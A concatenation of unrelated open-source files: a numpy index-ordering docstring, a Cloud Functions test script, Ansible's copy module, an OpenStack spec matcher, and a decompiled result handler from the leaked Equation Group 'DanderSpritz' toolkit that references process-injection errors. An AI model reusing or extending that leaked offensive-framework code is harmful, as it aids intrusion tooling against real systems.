stored in memory. Thus C is a Row-major language. The matrix is stored by
rows. Note that in both cases it presumes that the matrix convention for
indexing is being used, i.e., for both Fortran and C, the first index is the
row. Note this convention implies that the indexing convention is invariant
and that the data order changes to keep that so.
But that's not the only way
to look at it. Suppose one has large two-dimensional arrays (images or
matrices) stored in data files. Suppose the data are stored by rows rather than
by columns. If we are to preserve our index convention (whether matrix or
image) that means that depending on the language we use, we may be forced to
reorder the data if it is read into memory to preserve our indexing
convention. For example if we read row-ordered data into memory without
reordering, it will match the matrix indexing convention for C, but not for
Fortran. Conversely, it will match the image indexing convention for Fortran,
but not for C. For C, if one is using data stored in row order, and one wants
to preserve the image index convention, the data must be reordered when
reading into memory.
In the end, which you do for Fortran or C depends on
which is more important, not reordering data or preserving the indexing
convention. For large images, reordering data is potentially expensive, and
often the indexing convention is inverted to avoid that.
The situation with
numpy makes this issue yet more complicated. The internal machinery of numpy
arrays is flexible enough to accept any ordering of indices. One can simply
reorder indices by manipulating the internal stride information for arrays
without reordering the data at all. Numpy will know how to map the new index
order to the data without moving the data.
So if this is true, why not choose
the index order that matches what you most expect? In particular, why not define
row-ordered images to use the image convention? (This is sometimes referred
to as the Fortran convention vs the C convention, thus the 'C' and 'FORTRAN'
order options for array ordering in numpy.) The drawback of doing this is
potential performance penalties. It's common to access the data sequentially,
either implicitly in array operations or explicitly by looping over rows of an
image. When that is done, then the data will be accessed in non-optimal order.
As the first index is incremented, what is actually happening is that elements
spaced far apart in memory are being sequentially accessed, with usually poor
memory access speeds. For example, for a two dimensional image 'im' defined so
that im[0, 10] represents the value at x=0, y=10. To be consistent with usual
Python behavior then im[0] would represent a column at x=0. Yet that data
would be spread over the whole array since the data are stored in row order.
Despite the flexibility of numpy's indexing, it can't really paper over the fact
basic operations are rendered inefficient because of data order or that getting
contiguous subarrays is still awkward (e.g., im[:,0] for the first row, vs
im[0]), thus one can't use an idiom such as for row in im; for col in im does
work, but doesn't yield contiguous column data.
As it turns out, numpy is
smart enough when dealing with ufuncs to determine which index is the most
rapidly varying one in memory and uses that for the innermost loop. Thus for
ufuncs there is no large intrinsic advantage to either approach in most cases.
On the other hand, use of .flat with an FORTRAN ordered array will lead to
non-optimal memory access as adjacent elements in the flattened array (iterator,
actually) are not contiguous in memory.
Indeed, the fact is that Python
indexing on lists and other sequences naturally leads to an outside-to inside
ordering (the first index gets the largest grouping, the next the next largest,
and the last gets the smallest element). Since image data are normally stored
by rows, this corresponds to position within rows being the last item indexed.
If you do want to use Fortran ordering realize that
there are two approaches to consider: 1) accept that the first index is just not
the most rapidly changing in memory and have all your I/O routines reorder
your data when going from memory to disk or visa versa, or use numpy's
mechanism for mapping the first index to the most rapidly varying data. We
recommend the former if possible. The disadvantage of the latter is that many
of numpy's functions will yield arrays without Fortran ordering unless you are
careful to use the 'order' keyword. Doing this would be highly inconvenient.
Otherwise we recommend simply learning to reverse the usual order of indices
when accessing elements of an array. Granted, it goes against the grain, but
it is more in line with Python semantics and the natural order of the data.
"""
from __future__ import division, absolute_import, print_function
| bsd-3-clause |
googleapis/api-client-staging | test/python/functions/functions.py | 7 | 2790 | from google.cloud.functions.v1beta2 import cloud_functions_service_client
from google.cloud.proto.functions.v1beta2 import functions_pb2
from google.gax.errors import GaxError
from grpc import StatusCode
# point this at your project ID
PROJECT_ID = 'gapic-test'
LOCATION_ID = 'us-central1'
FUNCTION_ID = 'helloWorld'
# upload helloWorld.zip from this directory to Google Storage for your project
SOURCE_URI = 'gs://gapic-functions-v1beta2/helloWorld.zip'
api = cloud_functions_service_client.CloudFunctionsServiceClient()
location = api.location_path(PROJECT_ID, LOCATION_ID)
function_name = api.function_path(PROJECT_ID, LOCATION_ID, FUNCTION_ID)
def on_delete(operation_future):
try:
api.get_function(function_name)
except GaxError as e:
code = getattr(e.cause, "code", None)
if callable(code) and code() == StatusCode.NOT_FOUND:
print('Expect error here since the function should have been deleted')
else:
raise
def on_update(operation_future):
result = operation_future.result()
print('Function updated: \n%s\n' % result)
fetched_function = api.get_function(result.name)
print('Function fetched: \n%s\n' % fetched_function)
data = '{"message":"Hello World!"}'
call_response = api.call_function(fetched_function.name, data)
print('Function call response: \n%s\n' % call_response)
print('List functions:\n')
for function in api.list_functions(location):
print(function)
print('Delete function:\n')
delete_response = api.delete_function(function_name)
delete_response.add_done_callback(on_delete)
print('Metadata: \n%s\n' % delete_response.metadata())
def on_create(operation_future):
result = operation_future.result()
print('Function created: \n%s\n' % result)
updated_function = functions_pb2.CloudFunction(
name=result.name,
source_archive_url=result.source_archive_url,
pubsub_trigger=('projects/%s/topics/hello_world2' % PROJECT_ID))
response = api.update_function(result.name, updated_function)
response.add_done_callback(on_update)
print('Metadata: \n%s\n' % response.metadata())
def on_init(_):
function = functions_pb2.CloudFunction(
name=function_name,
source_archive_url=SOURCE_URI,
pubsub_trigger=('projects/%s/topics/hello_world' % PROJECT_ID))
response = api.create_function(location, function)
response.add_done_callback(on_create)
print('Metadata: \n%s\n' % response.metadata())
try:
response = api.delete_function(function_name)
response.add_done_callback(on_init)
except GaxError as e:
code = getattr(e.cause, "code", None)
if callable(code) and code() == StatusCode.NOT_FOUND:
on_init(None)
else:
raise
| bsd-3-clause |
DarthMaulware/EquationGroupLeaks | Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/DataHandlers/Mcl_Cmd_RunAsChild_DataHandler.py | 1 | 2075 | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: Mcl_Cmd_RunAsChild_DataHandler.py
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.process.cmd.runaschild', globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('RunAsChild', 'runaschild', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
if moduleError == ERR_INJECT_SETUP_FAILED or moduleError == ERR_INJECT_FAILED:
import mcl.injection.errors
output.RecordModuleError(moduleError, 0, errorStrings)
output.RecordModuleError(osError, 0, mcl.injection.errors.errorStrings)
else:
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
results = Result()
results.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Process')
xml.AddAttribute('id', '%u' % results.id)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
if __name__ == '__main__':
import sys
try:
namespace, InputFilename, OutputFilename = sys.argv[1:]
except:
print '%s <namespace> <input filename> <output filename>' % sys.argv[0]
sys.exit(1)
if DataHandlerMain(namespace, InputFilename, OutputFilename) != True:
sys.exit(-1) | unlicense |
mgit-at/ansible | lib/ansible/modules/files/copy.py | 17 | 29399 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: copy
version_added: "historical"
short_description: Copies files to remote locations
description:
- The C(copy) module copies a file from the local or remote machine to a location on the remote machine.
Use the M(fetch) module to copy files from remote locations to the local box.
If you need variable interpolation in copied files, use the M(template) module.
- For Windows targets, use the M(win_copy) module instead.
options:
src:
description:
- Local path to a file to copy to the remote server; can be absolute or relative.
If path is a directory, it is copied recursively. In this case, if path ends
with "/", only inside contents of that directory are copied to destination.
Otherwise, if it does not end with "/", the directory itself with all contents
is copied. This behavior is similar to Rsync.
content:
description:
- When used instead of I(src), sets the contents of a file directly to the specified value.
For anything advanced or with formatting also look at the template module.
version_added: "1.1"
dest:
description:
- 'Remote absolute path where the file should be copied to. If I(src) is a directory, this must be a directory too.
If I(dest) is a nonexistent path and if either I(dest) ends with "/" or I(src) is a directory, I(dest) is created.
If I(src) and I(dest) are files, the parent directory of I(dest) isn''t created: the task fails if it doesn''t already exist.'
required: yes
backup:
description:
- Create a backup file including the timestamp information so you can get
the original file back if you somehow clobbered it incorrectly.
type: bool
default: 'no'
version_added: "0.7"
force:
description:
- the default is C(yes), which will replace the remote file when contents
are different than the source. If C(no), the file will only be transferred
if the destination does not exist.
type: bool
default: 'yes'
aliases: [ thirsty ]
version_added: "1.1"
mode:
description:
- "Mode the file or directory should be. For those used to I(/usr/bin/chmod) remember that
modes are actually octal numbers. You must either add a leading zero so that Ansible's
YAML parser knows it is an octal number (like C(0644) or C(01777)) or quote it
(like C('644') or C('1777')) so Ansible receives a string and can do its own conversion from
string into number. Giving Ansible a number without following one of these rules will end
up with a decimal number which will have unexpected results. As of version 1.8, the mode
may be specified as a symbolic mode (for example, C(u+rwx) or C(u=rw,g=r,o=r)). As of
version 2.3, the mode may also be the special string C(preserve). C(preserve) means that
the file will be given the same permissions as the source file."
directory_mode:
description:
- When doing a recursive copy set the mode for the directories. If this is not set we will use the system
defaults. The mode is only set on directories which are newly created, and will not affect those that
already existed.
version_added: "1.5"
remote_src:
description:
- If C(no), it will search for I(src) at originating/master machine.
- If C(yes) it will go to the remote/target machine for the I(src). Default is C(no).
- I(remote_src) supports recursive copying as of version 2.8.
- I(remote_src) only works with C(mode=preserve) as of version 2.6.
type: bool
default: 'no'
version_added: "2.0"
follow:
description:
- This flag indicates that filesystem links in the destination, if they exist, should be followed.
type: bool
default: 'no'
version_added: "1.8"
local_follow:
description:
- This flag indicates that filesystem links in the source tree, if they exist, should be followed.
type: bool
default: 'yes'
version_added: "2.4"
checksum:
description:
- SHA1 checksum of the file being transferred. Used to validate that the copy of the file was successful.
- If this is not provided, ansible will use the local calculated checksum of the src file.
version_added: '2.5'
extends_documentation_fragment:
- files
- validate
- decrypt
author:
- Ansible Core Team
- Michael DeHaan
notes:
- The M(copy) module recursively copy facility does not scale to lots (>hundreds) of files.
For alternative, see M(synchronize) module, which is a wrapper around C(rsync).
- For Windows targets, use the M(win_copy) module instead.
'''
EXAMPLES = r'''
- name: example copying file with owner and permissions
copy:
src: /srv/myfiles/foo.conf
dest: /etc/foo.conf
owner: foo
group: foo
mode: 0644
- name: The same example as above, but using a symbolic mode equivalent to 0644
copy:
src: /srv/myfiles/foo.conf
dest: /etc/foo.conf
owner: foo
group: foo
mode: u=rw,g=r,o=r
- name: Another symbolic mode example, adding some permissions and removing others
copy:
src: /srv/myfiles/foo.conf
dest: /etc/foo.conf
owner: foo
group: foo
mode: u+rw,g-wx,o-rwx
- name: Copy a new "ntp.conf file into place, backing up the original if it differs from the copied version
copy:
src: /mine/ntp.conf
dest: /etc/ntp.conf
owner: root
group: root
mode: 0644
backup: yes
- name: Copy a new "sudoers" file into place, after passing validation with visudo
copy:
src: /mine/sudoers
dest: /etc/sudoers
validate: /usr/sbin/visudo -cf %s
- name: Copy a "sudoers" file on the remote machine for editing
copy:
src: /etc/sudoers
dest: /etc/sudoers.edit
remote_src: yes
validate: /usr/sbin/visudo -cf %s
- name: Copy using the 'content' for inline data
copy:
content: '# This file was moved to /etc/other.conf'
dest: /etc/mine.conf
- name: if follow is true, /path/to/file will be overwritten by contents of foo.conf
copy:
src: /etc/foo.conf
dest: /path/to/link # /path/to/link is link to /path/to/file
follow: True
- name: if follow is False, /path/to/link will become a file and be overwritten by contents of foo.conf
copy:
src: /etc/foo.conf
dest: /path/to/link # /path/to/link is link to /path/to/file
follow: False
'''
RETURN = r'''
dest:
description: destination file/path
returned: success
type: string
sample: /path/to/file.txt
src:
description: source file used for the copy on the target machine
returned: changed
type: string
sample: /home/httpd/.ansible/tmp/ansible-tmp-1423796390.97-147729857856000/source
md5sum:
description: md5 checksum of the file after running copy
returned: when supported
type: string
sample: 2a5aeecc61dc98c4d780b14b330e3282
checksum:
description: sha1 checksum of the file after running copy
returned: success
type: string
sample: 6e642bb8dd5c2e027bf21dd923337cbb4214f827
backup_file:
description: name of backup file created
returned: changed and if backup=yes
type: string
sample: /path/to/file.txt.2015-02-12@22:09~
gid:
description: group id of the file, after execution
returned: success
type: int
sample: 100
group:
description: group of the file, after execution
returned: success
type: string
sample: httpd
owner:
description: owner of the file, after execution
returned: success
type: string
sample: httpd
uid:
description: owner id of the file, after execution
returned: success
type: int
sample: 100
mode:
description: permissions of the target, after execution
returned: success
type: string
sample: 0644
size:
description: size of the target, after execution
returned: success
type: int
sample: 1220
state:
description: state of the target, after execution
returned: success
type: string
sample: file
'''
import os
import os.path
import shutil
import filecmp
import pwd
import grp
import stat
import errno
import tempfile
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_bytes, to_native
class AnsibleModuleError(Exception):
def __init__(self, results):
self.results = results
def split_pre_existing_dir(dirname):
'''
Return the first pre-existing directory and a list of the new directories that will be created.
'''
head, tail = os.path.split(dirname)
b_head = to_bytes(head, errors='surrogate_or_strict')
if head == '':
return ('.', [tail])
if not os.path.exists(b_head):
if head == '/':
raise AnsibleModuleError(results={'msg': "The '/' directory doesn't exist on this machine."})
(pre_existing_dir, new_directory_list) = split_pre_existing_dir(head)
else:
return (head, [tail])
new_directory_list.append(tail)
return (pre_existing_dir, new_directory_list)
def adjust_recursive_directory_permissions(pre_existing_dir, new_directory_list, module, directory_args, changed):
'''
Walk the new directories list and make sure that permissions are as we would expect
'''
if new_directory_list:
working_dir = os.path.join(pre_existing_dir, new_directory_list.pop(0))
directory_args['path'] = working_dir
changed = module.set_fs_attributes_if_different(directory_args, changed)
changed = adjust_recursive_directory_permissions(working_dir, new_directory_list, module, directory_args, changed)
return changed
def chown_recursive(path, module):
changed = False
owner = module.params['owner']
group = module.params['group']
if owner is not None:
if not module.check_mode:
for dirpath, dirnames, filenames in os.walk(path):
owner_changed = module.set_owner_if_different(dirpath, owner, False)
if owner_changed is True:
changed = owner_changed
for dir in [os.path.join(dirpath, d) for d in dirnames]:
owner_changed = module.set_owner_if_different(dir, owner, False)
if owner_changed is True:
changed = owner_changed
for file in [os.path.join(dirpath, f) for f in filenames]:
owner_changed = module.set_owner_if_different(file, owner, False)
if owner_changed is True:
changed = owner_changed
else:
uid = pwd.getpwnam(owner).pw_uid
for dirpath, dirnames, filenames in os.walk(path):
owner_changed = (os.stat(dirpath).st_uid != uid)
if owner_changed is True:
changed = owner_changed
for dir in [os.path.join(dirpath, d) for d in dirnames]:
owner_changed = (os.stat(dir).st_uid != uid)
if owner_changed is True:
changed = owner_changed
for file in [os.path.join(dirpath, f) for f in filenames]:
owner_changed = (os.stat(file).st_uid != uid)
if owner_changed is True:
changed = owner_changed
if group is not None:
if not module.check_mode:
for dirpath, dirnames, filenames in os.walk(path):
group_changed = module.set_group_if_different(dirpath, group, False)
if group_changed is True:
changed = group_changed
for dir in [os.path.join(dirpath, d) for d in dirnames]:
group_changed = module.set_group_if_different(dir, group, False)
if group_changed is True:
changed = group_changed
for file in [os.path.join(dirpath, f) for f in filenames]:
group_changed = module.set_group_if_different(file, group, False)
if group_changed is True:
changed = group_changed
else:
gid = grp.getgrnam(group).gr_gid
for dirpath, dirnames, filenames in os.walk(path):
group_changed = (os.stat(dirpath).st_gid != gid)
if group_changed is True:
changed = group_changed
for dir in [os.path.join(dirpath, d) for d in dirnames]:
group_changed = (os.stat(dir).st_gid != gid)
if group_changed is True:
changed = group_changed
for file in [os.path.join(dirpath, f) for f in filenames]:
group_changed = (os.stat(file).st_gid != gid)
if group_changed is True:
changed = group_changed
return changed
def copy_diff_files(src, dest, module):
changed = False
owner = module.params['owner']
group = module.params['group']
local_follow = module.params['local_follow']
diff_files = filecmp.dircmp(src, dest).diff_files
if len(diff_files):
changed = True
if not module.check_mode:
for item in diff_files:
src_item_path = os.path.join(src, item)
dest_item_path = os.path.join(dest, item)
b_src_item_path = to_bytes(src_item_path, errors='surrogate_or_strict')
b_dest_item_path = to_bytes(dest_item_path, errors='surrogate_or_strict')
if os.path.islink(b_src_item_path) and local_follow is False:
linkto = os.readlink(b_src_item_path)
os.symlink(linkto, b_dest_item_path)
else:
shutil.copyfile(b_src_item_path, b_dest_item_path)
if owner is not None:
module.set_owner_if_different(b_dest_item_path, owner, False)
if group is not None:
module.set_group_if_different(b_dest_item_path, group, False)
changed = True
return changed
def copy_left_only(src, dest, module):
changed = False
owner = module.params['owner']
group = module.params['group']
local_follow = module.params['local_follow']
left_only = filecmp.dircmp(src, dest).left_only
if len(left_only):
changed = True
if not module.check_mode:
for item in left_only:
src_item_path = os.path.join(src, item)
dest_item_path = os.path.join(dest, item)
b_src_item_path = to_bytes(src_item_path, errors='surrogate_or_strict')
b_dest_item_path = to_bytes(dest_item_path, errors='surrogate_or_strict')
if os.path.islink(b_src_item_path) and os.path.isdir(b_src_item_path) and local_follow is True:
shutil.copytree(b_src_item_path, b_dest_item_path, symlinks=not(local_follow))
chown_recursive(b_dest_item_path, module)
if os.path.islink(b_src_item_path) and os.path.isdir(b_src_item_path) and local_follow is False:
linkto = os.readlink(b_src_item_path)
os.symlink(linkto, b_dest_item_path)
if os.path.islink(b_src_item_path) and os.path.isfile(b_src_item_path) and local_follow is True:
shutil.copyfile(b_src_item_path, b_dest_item_path)
if owner is not None:
module.set_owner_if_different(b_dest_item_path, owner, False)
if group is not None:
module.set_group_if_different(b_dest_item_path, group, False)
if os.path.islink(b_src_item_path) and os.path.isfile(b_src_item_path) and local_follow is False:
linkto = os.readlink(b_src_item_path)
os.symlink(linkto, b_dest_item_path)
if not os.path.islink(b_src_item_path) and os.path.isfile(b_src_item_path):
shutil.copyfile(b_src_item_path, b_dest_item_path)
if owner is not None:
module.set_owner_if_different(b_dest_item_path, owner, False)
if group is not None:
module.set_group_if_different(b_dest_item_path, group, False)
if not os.path.islink(b_src_item_path) and os.path.isdir(b_src_item_path):
shutil.copytree(b_src_item_path, b_dest_item_path, symlinks=not(local_follow))
chown_recursive(b_dest_item_path, module)
changed = True
return changed
def copy_common_dirs(src, dest, module):
changed = False
common_dirs = filecmp.dircmp(src, dest).common_dirs
for item in common_dirs:
src_item_path = os.path.join(src, item)
dest_item_path = os.path.join(dest, item)
b_src_item_path = to_bytes(src_item_path, errors='surrogate_or_strict')
b_dest_item_path = to_bytes(dest_item_path, errors='surrogate_or_strict')
diff_files_changed = copy_diff_files(b_src_item_path, b_dest_item_path, module)
left_only_changed = copy_left_only(b_src_item_path, b_dest_item_path, module)
if diff_files_changed or left_only_changed:
changed = True
return changed
def main():
module = AnsibleModule(
# not checking because of daisy chain to file module
argument_spec=dict(
src=dict(type='path'),
_original_basename=dict(type='str'), # used to handle 'dest is a directory' via template, a slight hack
content=dict(type='str', no_log=True),
dest=dict(type='path', required=True),
backup=dict(type='bool', default=False),
force=dict(type='bool', default=True, aliases=['thirsty']),
validate=dict(type='str'),
directory_mode=dict(type='raw'),
remote_src=dict(type='bool'),
local_follow=dict(type='bool'),
checksum=dict(),
),
add_file_common_args=True,
supports_check_mode=True,
)
src = module.params['src']
b_src = to_bytes(src, errors='surrogate_or_strict')
dest = module.params['dest']
# Make sure we always have a directory component for later processing
if os.path.sep not in dest:
dest = '.{0}{1}'.format(os.path.sep, dest)
b_dest = to_bytes(dest, errors='surrogate_or_strict')
backup = module.params['backup']
force = module.params['force']
_original_basename = module.params.get('_original_basename', None)
validate = module.params.get('validate', None)
follow = module.params['follow']
local_follow = module.params['local_follow']
mode = module.params['mode']
owner = module.params['owner']
group = module.params['group']
remote_src = module.params['remote_src']
checksum = module.params['checksum']
if not os.path.exists(b_src):
module.fail_json(msg="Source %s not found" % (src))
if not os.access(b_src, os.R_OK):
module.fail_json(msg="Source %s not readable" % (src))
# Preserve is usually handled in the action plugin but mode + remote_src has to be done on the
# remote host
if module.params['mode'] == 'preserve':
module.params['mode'] = '0%03o' % stat.S_IMODE(os.stat(b_src).st_mode)
mode = module.params['mode']
checksum_dest = None
if os.path.isfile(src):
checksum_src = module.sha1(src)
else:
checksum_src = None
# Backwards compat only. This will be None in FIPS mode
try:
if os.path.isfile(src):
md5sum_src = module.md5(src)
else:
md5sum_src = None
except ValueError:
md5sum_src = None
changed = False
if checksum and checksum_src != checksum:
module.fail_json(
msg='Copied file does not match the expected checksum. Transfer failed.',
checksum=checksum_src,
expected_checksum=checksum
)
# Special handling for recursive copy - create intermediate dirs
if _original_basename and dest.endswith(os.sep):
dest = os.path.join(dest, _original_basename)
b_dest = to_bytes(dest, errors='surrogate_or_strict')
dirname = os.path.dirname(dest)
b_dirname = to_bytes(dirname, errors='surrogate_or_strict')
if not os.path.exists(b_dirname):
try:
(pre_existing_dir, new_directory_list) = split_pre_existing_dir(dirname)
except AnsibleModuleError as e:
e.result['msg'] += ' Could not copy to {0}'.format(dest)
module.fail_json(**e.results)
os.makedirs(b_dirname)
directory_args = module.load_file_common_arguments(module.params)
directory_mode = module.params["directory_mode"]
if directory_mode is not None:
directory_args['mode'] = directory_mode
else:
directory_args['mode'] = None
adjust_recursive_directory_permissions(pre_existing_dir, new_directory_list, module, directory_args, changed)
if os.path.isdir(b_dest):
basename = os.path.basename(src)
if _original_basename:
basename = _original_basename
dest = os.path.join(dest, basename)
b_dest = to_bytes(dest, errors='surrogate_or_strict')
if os.path.exists(b_dest):
if os.path.islink(b_dest) and follow:
b_dest = os.path.realpath(b_dest)
dest = to_native(b_dest, errors='surrogate_or_strict')
if not force:
module.exit_json(msg="file already exists", src=src, dest=dest, changed=False)
if os.access(b_dest, os.R_OK) and os.path.isfile(dest):
checksum_dest = module.sha1(dest)
else:
if not os.path.exists(os.path.dirname(b_dest)):
try:
# os.path.exists() can return false in some
# circumstances where the directory does not have
# the execute bit for the current user set, in
# which case the stat() call will raise an OSError
os.stat(os.path.dirname(b_dest))
except OSError as e:
if "permission denied" in to_native(e).lower():
module.fail_json(msg="Destination directory %s is not accessible" % (os.path.dirname(dest)))
module.fail_json(msg="Destination directory %s does not exist" % (os.path.dirname(dest)))
if not os.access(os.path.dirname(b_dest), os.W_OK) and not module.params['unsafe_writes']:
module.fail_json(msg="Destination %s not writable" % (os.path.dirname(dest)))
backup_file = None
if checksum_src != checksum_dest or os.path.islink(b_dest):
if not module.check_mode:
try:
if backup:
if os.path.exists(b_dest):
backup_file = module.backup_local(dest)
# allow for conversion from symlink.
if os.path.islink(b_dest):
os.unlink(b_dest)
open(b_dest, 'w').close()
if validate:
# if we have a mode, make sure we set it on the temporary
# file source as some validations may require it
if mode is not None:
module.set_mode_if_different(src, mode, False)
if owner is not None:
module.set_owner_if_different(src, owner, False)
if group is not None:
module.set_group_if_different(src, group, False)
if "%s" not in validate:
module.fail_json(msg="validate must contain %%s: %s" % (validate))
(rc, out, err) = module.run_command(validate % src)
if rc != 0:
module.fail_json(msg="failed to validate", exit_status=rc, stdout=out, stderr=err)
b_mysrc = b_src
if remote_src and os.path.isfile(b_src):
_, b_mysrc = tempfile.mkstemp(dir=os.path.dirname(b_dest))
shutil.copyfile(b_src, b_mysrc)
try:
shutil.copystat(b_src, b_mysrc)
except OSError as err:
if err.errno == errno.ENOSYS and mode == "preserve":
module.warn("Unable to copy stats {0}".format(to_native(b_src)))
else:
raise
module.atomic_move(b_mysrc, dest, unsafe_writes=module.params['unsafe_writes'])
except (IOError, OSError):
module.fail_json(msg="failed to copy: %s to %s" % (src, dest), traceback=traceback.format_exc())
changed = True
else:
changed = False
if checksum_src is None and checksum_dest is None:
if remote_src and os.path.isdir(module.params['src']):
b_src = to_bytes(module.params['src'], errors='surrogate_or_strict')
b_dest = to_bytes(module.params['dest'], errors='surrogate_or_strict')
if src.endswith(os.path.sep) and os.path.isdir(module.params['dest']):
diff_files_changed = copy_diff_files(b_src, b_dest, module)
left_only_changed = copy_left_only(b_src, b_dest, module)
common_dirs_changed = copy_common_dirs(b_src, b_dest, module)
owner_group_changed = chown_recursive(b_dest, module)
if diff_files_changed or left_only_changed or common_dirs_changed or owner_group_changed:
changed = True
if src.endswith(os.path.sep) and not os.path.exists(module.params['dest']):
b_basename = to_bytes(os.path.basename(src), errors='surrogate_or_strict')
b_dest = to_bytes(os.path.join(b_dest, b_basename), errors='surrogate_or_strict')
b_src = to_bytes(os.path.join(module.params['src'], ""), errors='surrogate_or_strict')
if not module.check_mode:
shutil.copytree(b_src, b_dest, symlinks=not(local_follow))
chown_recursive(dest, module)
changed = True
if not src.endswith(os.path.sep) and os.path.isdir(module.params['dest']):
b_basename = to_bytes(os.path.basename(src), errors='surrogate_or_strict')
b_dest = to_bytes(os.path.join(b_dest, b_basename), errors='surrogate_or_strict')
b_src = to_bytes(os.path.join(module.params['src'], ""), errors='surrogate_or_strict')
if not module.check_mode and not os.path.exists(b_dest):
shutil.copytree(b_src, b_dest, symlinks=not(local_follow))
changed = True
chown_recursive(dest, module)
if module.check_mode and not os.path.exists(b_dest):
changed = True
if os.path.exists(b_dest):
diff_files_changed = copy_diff_files(b_src, b_dest, module)
left_only_changed = copy_left_only(b_src, b_dest, module)
common_dirs_changed = copy_common_dirs(b_src, b_dest, module)
owner_group_changed = chown_recursive(b_dest, module)
if diff_files_changed or left_only_changed or common_dirs_changed or owner_group_changed:
changed = True
if not src.endswith(os.path.sep) and not os.path.exists(module.params['dest']):
b_basename = to_bytes(os.path.basename(module.params['src']), errors='surrogate_or_strict')
b_dest = to_bytes(os.path.join(b_dest, b_basename), errors='surrogate_or_strict')
if not module.check_mode and not os.path.exists(b_dest):
os.makedirs(b_dest)
b_src = to_bytes(os.path.join(module.params['src'], ""), errors='surrogate_or_strict')
diff_files_changed = copy_diff_files(b_src, b_dest, module)
left_only_changed = copy_left_only(b_src, b_dest, module)
common_dirs_changed = copy_common_dirs(b_src, b_dest, module)
owner_group_changed = chown_recursive(b_dest, module)
if diff_files_changed or left_only_changed or common_dirs_changed or owner_group_changed:
changed = True
if module.check_mode and not os.path.exists(b_dest):
changed = True
res_args = dict(
dest=dest, src=src, md5sum=md5sum_src, checksum=checksum_src, changed=changed
)
if backup_file:
res_args['backup_file'] = backup_file
module.params['dest'] = dest
if not module.check_mode:
file_args = module.load_file_common_arguments(module.params)
res_args['changed'] = module.set_fs_attributes_if_different(file_args, res_args['changed'])
module.exit_json(**res_args)
if __name__ == '__main__':
main()
| gpl-3.0 |
inkerra/cinder | cinder/openstack/common/scheduler/filters/extra_specs_ops.py | 21 | 2336 | # Copyright (c) 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import operator
from cinder.openstack.common import strutils
# 1. The following operations are supported:
# =, s==, s!=, s>=, s>, s<=, s<, <in>, <is>, <or>, ==, !=, >=, <=
# 2. Note that <or> is handled in a different way below.
# 3. If the first word in the extra_specs is not one of the operators,
# it is ignored.
_op_methods = {'=': lambda x, y: float(x) >= float(y),
'<in>': lambda x, y: y in x,
'<is>': lambda x, y: (strutils.bool_from_string(x) is
strutils.bool_from_string(y)),
'==': lambda x, y: float(x) == float(y),
'!=': lambda x, y: float(x) != float(y),
'>=': lambda x, y: float(x) >= float(y),
'<=': lambda x, y: float(x) <= float(y),
's==': operator.eq,
's!=': operator.ne,
's<': operator.lt,
's<=': operator.le,
's>': operator.gt,
's>=': operator.ge}
def match(value, req):
words = req.split()
op = method = None
if words:
op = words.pop(0)
method = _op_methods.get(op)
if op != '<or>' and not method:
return value == req
if value is None:
return False
if op == '<or>': # Ex: <or> v1 <or> v2 <or> v3
while True:
if words.pop(0) == value:
return True
if not words:
break
op = words.pop(0) # remove a keyword <or>
if not words:
break
return False
try:
if words and method(value, words[0]):
return True
except ValueError:
pass
return False
| apache-2.0 |
percy-g2/Novathor_xperia_u8500 | 6.1.1.B.0.253/external/webkit/Tools/Scripts/webkitpy/layout_tests/port/webkit_unittest.py | 15 | 4864 | #!/usr/bin/env python
# Copyright (C) 2010 Gabor Rapcsanyi <rgabor@inf.u-szeged.hu>, University of Szeged
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY UNIVERSITY OF SZEGED ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL UNIVERSITY OF SZEGED OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
